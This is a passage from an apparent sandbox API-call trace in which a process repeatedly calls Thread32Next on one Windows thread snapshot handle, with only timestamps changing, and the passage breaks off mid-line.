[0239.210] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.211] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.212] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.213] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.214] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.214] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.593] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.594] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.598] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.599] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.600] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.601] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.601] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.835] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.836] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.838] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.838] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.842] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.866] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.122] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.123] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.123] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.426] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.427] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.428] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.429] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.429] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.430] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.431] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.432] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.432] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.433] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.434] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.434] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.435] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.436] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.437] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.438] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.438] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.439] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.440] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.440] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.441] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.442] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.442] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.443] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.444] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.444] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.445] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.446] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.447] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.448] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.448] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.449] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.450] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.451] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.451] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.452] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.453] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.453] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.454] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.455] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.457] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.458] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.749] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.750] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.751] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.751] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.752] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.753] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.753] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.754] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.755] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.755] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.756] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.757] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.757] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.758] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.759] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.010] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.012] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.015] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.016] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.017] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.018] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.019] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.019] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.020] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.021] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.022] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.023] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.024] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.024] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.025] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.026] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.228] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.228] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.229] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.230] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.231] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.232] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.232] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.233] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.234] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.235] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.236] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.237] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.237] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.238] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.239] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.240] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.240] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.241] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.242] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.242] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.243] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.244] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.245] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.246] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.246] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.247] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.248] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.248] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.249] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.250] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.251] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.251] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.252] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.253] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.254] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.254] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.255] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.256] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.257] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.257] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.258] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.259] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.260] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.260] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.261] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.262] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.536] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.537] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.538] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.540] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.540] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.543] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.544] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.551] Thread32Next (hSnapshot=0x17c, 